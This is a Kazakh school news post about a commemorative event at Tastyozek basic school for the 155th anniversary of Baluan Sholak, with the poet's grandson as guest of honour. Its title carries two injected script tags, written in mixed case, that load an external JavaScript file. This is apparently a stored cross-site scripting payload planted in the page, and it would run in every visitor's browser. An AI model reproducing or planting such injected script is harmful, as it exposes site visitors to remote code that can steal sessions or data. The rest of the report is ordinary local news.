Тастыөзек негізгі мектебінде болған бір күн<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.05.2019

    Бұланды ауданы білім беру бөлімінің жоспары негізінде бүгін 13 мамыр   Тастыөзек НМ –де  Балуан Шолақ (Нұрмағамбет) Баймырзаұлының 155 жылдық мерейтойына арналған «Мен халқымның Балуан Шолағымын» тақырыбында  іс –шара өтілді.

    Іс шараның құрметті қонағы балуан атамыздың немересі Шолақов Қайрулла Құдайбергенович, аудандық «Бұланды ақпараты» газетінің тілшісі, аудандық оқу бөлімінің әдіскерлері болды. Мектеп оқушылар  Балуан Шолақ  Баймырзаұлының өмірі, шығармашылығы туралы  әңгімеледі, өлеңдерін оқыды.  Іс шара соңында  Шолақов Қайрулла Құдайбергенович ұстаздар мен оқушыларға жылы лебізін білдіріп, атасы жайлы ойларымен бөлісті.

     Тастыөзек жеріндегі  тарихи тұлғаға қойылған ескерткішке арнайы ат басын бұрып барып, тағызым еттік.

 

Әдіскер:    Муса М

Просмотров: 731


Пікір қосу



Деректерді қолтаңбаға қосу